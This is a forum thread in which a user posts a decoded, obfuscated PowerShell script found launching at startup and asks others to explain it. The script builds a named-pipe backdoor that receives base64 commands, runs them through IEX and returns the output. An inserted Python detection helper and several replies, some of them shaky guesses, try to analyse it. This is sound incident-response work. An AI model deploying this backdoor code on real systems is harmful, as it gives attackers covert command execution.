NotAdmin

Powershell code analysis - is this stuff safe?


Hi all,

 

I've detected an attempt to execute a PowerShell command on a machine and, after decoding it, I retrieved these commands:

 

# Pipe names handed to the background job (random-looking strings).
$pn = "awkywlhbod"
$pm = "xnopgdzmw6"

# Script block that runs inside a background job (see start-job below).
$sb = {
param ($pn, $pm)
add-Type -assembly "System.Core"

# First named pipe ($pn): ACL grants Everyone read/write access.
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
# Read a single line from whoever connects, then close the pipe.
$pr = new-object System.IO.StreamReader($p)
$o = $pr.ReadLine()
$p.Dispose();
$pr.Dispose();

# Base64-decode that line and execute it as PowerShell (IEX = Invoke-Expression),
# keeping whatever it outputs as a string.
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string

# Second named pipe ($pm), same permissive ACL: the command output is written back out here.
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$ps.AddAccessRule($ar)
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pm,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$p.WaitForConnection();
$pw = new-object System.IO.StreamWriter($p)
$pw.AutoFlush = $true
$pw.WriteLine($o);
$p.Dispose();
}

# Start the script block as a background job, passing both pipe names.
add-Type -assembly "System.Core"
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)

# Client-side handles to both pipes are created but never connected or used in this script.
$pl = new-object System.IO.Pipes.NamedPipeClientStream(".", $pn);
$pp = new-object System.IO.Pipes.NamedPipeClientStream(".", $pm);

# Keep the job alive for 10 minutes, then stop it.
Start-Sleep 600
$t.StopJob()

 

Is there anyone who can help me understand what this stands for?

Thank you very much in advance!!

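An added triage helper, not code from the thread or from any poster: it decodes a PowerShell -EncodedCommand blob (base64 over UTF-16LE, the standard form; whether the sample here was encoded that way is an assumption) and flags the features of the posted script that make it dangerous, namely base64 decoding feeding IEX, a NamedPipeServerStream with an Everyone access rule, and Start-Job. The sample input is constructed from lines of the posted script; the indicator names and weights are my own choice.

```python
import base64
import re

# Constructed sample: a few lines from the decoded script in this thread,
# re-encoded the way powershell.exe -EncodedCommand expects (UTF-16LE, then base64).
SAMPLE_SCRIPT = r'''$pn = "awkywlhbod"
$ps = New-Object System.IO.Pipes.PipeSecurity
$ar = New-Object System.IO.Pipes.PipeAccessRule( "Everyone", "ReadWrite", "Allow" )
$p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps)
$s = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($o)) | out-string
$o = IEX $s |out-string
$t = start-job -ScriptBlock $sb -ArgumentList @($pn, $pm)
'''
ENCODED_SAMPLE = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")

# Indicators taken from the script in this thread. The weights are my own
# triage choice (assumption), not a vendor signature set.
INDICATORS = {
    "base64_decode":     (r"FromBase64String", 2),
    "invoke_expression": (r"\b(IEX|Invoke-Expression)\b", 3),
    "named_pipe_server": (r"NamedPipeServerStream", 2),
    "pipe_acl_everyone": (r'PipeAccessRule\(\s*"Everyone"', 2),
    "background_job":    (r"\bStart-Job\b", 1),
}

def decode_encoded_command(blob: str) -> str:
    """Decode a -EncodedCommand value: base64 wrapping UTF-16LE text."""
    return base64.b64decode(blob, validate=True).decode("utf-16-le")

def triage(script: str) -> dict:
    """Match each indicator (PowerShell is case-insensitive) and sum the weights."""
    hits = {name: bool(re.search(pat, script, re.IGNORECASE))
            for name, (pat, _) in INDICATORS.items()}
    score = sum(w for name, (_, w) in INDICATORS.items() if hits[name])
    # Decoding feeding IEX is enough on its own to treat the script as hostile;
    # the pipe indicators explain how it receives the commands it runs.
    verdict = "high" if hits["invoke_expression"] and hits["base64_decode"] else (
        "medium" if score >= 3 else "low")
    return {"score": score, "verdict": verdict,
            "hits": sorted(n for n, h in hits.items() if h)}

def triage_encoded(blob: str) -> dict:
    """Decode first, then triage the clear text."""
    return triage(decode_encoded_command(blob))

if __name__ == "__main__":
    print(triage_encoded(ENCODED_SAMPLE))
```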

I assume the code you posted was from a PowerShell script that attempted to run? If so, your first task is locating where that script is stored on your OS installation drive. 

The key to determining PowerShell malicious use is the context in which it is run. If it is spawned from an MS Office app; run from the shell of an existing app such as explorer.exe; or spawned as a child process from cmd.exe or the other Win script engines, it can be deemed suspicious.

As far as the code itself, you need to find someone familiar with C# and PowerShell script code. My rough guess is it appears to be loading a PowerShell assembly. This code, add-Type -assembly "System.Core", indicates it is using PowerShell v2, which is not the default unless Win 7 or 2008 R2 is running. Again, I am not a C# or PowerShell script code expert.

-EDIT- Also, the majority of malicious PowerShell scripts are packed, encrypted, and obfuscated to avoid detection upon download and execution.

All the above said, I monitor PowerShell execution with an Eset HIPS rule and that rule has never been triggered to date.

Edited by itman


Hi itman, 

I tried to locate the script, but PowerShell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found.

This process (cmd.exe, which executes powershell.exe) was triggered 5-6 times at system startup, without any particular "pattern" (it seems a random process): that is, PowerShell execution was detected on Monday, then another event 4 days later, another after 7, and so on.

The event viewer didn't record any particular event in these specific timeframes. 

N.B.: the PowerShell script was obfuscated; I decoded it, and what I pasted is the clear-text command.

Many many thanks! 

 

1 hour ago, NotAdmin said:

I tried to locate the script, but PowerShell came from cmd.exe (we are talking about a Win7 environment) and no other parent processes were found.

N.B.: the PowerShell script was obfuscated; I decoded it, and what I pasted is the clear-text command.

I am a bit confused. You would have had to locate the script to decode it, correct? Or did you find the .bat script that is executing the PowerShell script?

In any case, since the PowerShell script is starting at boot time and is at least obfuscated, that would put it at least in the suspicious category. Also, the PowerShell script is being executed via cmd.exe, which is a common malware technique.

For starters, I would submit the .bat script to VirusTotal to see if it detects anything. What bothers me is this code:

$pn = "awkywlhbod"
$pm = "xnopgdzmw6"

I swear I have seen references to those names before, but a Google search comes up empty. If VT shows no detections, I would submit the .bat script to Eset for analysis. Based on this GitHub code reference: https://github.com/nettitude/PoshC2/blob/master/Modules/NamedPipeProxy.ps1 , this line from the code you posted - $pw = new-object System.IO.StreamWriter($p) - indicates some type of proxy server is being established, which is not a good thing.


Apologies if I was not clear; I'll try to explain the point better.

I received an alert of suspicious PowerShell execution at a certain time, and the related obfuscated command was retrieved by the antimalware (in other words, I know what was executed, but I have to understand why). So, after analysis I saw that PowerShell was triggered by cmd.exe, but no other parent processes were found because this happened at system startup, and I do not have other elements to continue the investigation (I'm thinking that something in autoexec has been compromised).

In the meantime, I tried to deobfuscate the PowerShell script (base64 encoded) and finally ended up with the commands attached.

At the moment I know what, when, who, where, how... I need to understand why! :)

32 minutes ago, NotAdmin said:

So, after analysis I saw that PowerShell was triggered by cmd.exe, but no other parent processes were found because this happened at system startup, and I do not have other elements to continue the investigation (I'm thinking that something in autoexec has been compromised).

Eset has an advanced HIPS setting that, if enabled, will monitor all system startup activity. Note that you will get numerous alerts when this setting is enabled. Also, I am not 100% sure what it will show; hopefully what is starting the .bat script at boot time, which might just be winlogon.exe, which won't help much. This is why I suggested the Microsoft/SysInternals Autoruns product, which is free and can be downloaded here: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns . Just be careful using it, since it can bork your OS.


Yes, I already used Autoruns to check for rubbish running at startup, but I didn't find any suspicious activity/process.

It's really strange...  


By the way, are you an Eset user?


Not a malware writer, just a PowerShell guy, but... the line you reference, $pw = new-object System.IO.StreamWriter($p), is just writing information (actually one of the faster, if not the fastest, ways to write to a file in PS). The $p = New-Object System.IO.Pipes.NamedPipeServerStream($pn,"InOut",100, "Byte", "None", 1024, 1024, $ps) line, and the others referencing System.IO.Pipes, refer to making a pipe connection to another system, which would be concerning.

Doubt it's immediately helpful, but it may assist when looking at other PS scripts for malicious intent.

 

Jdashn
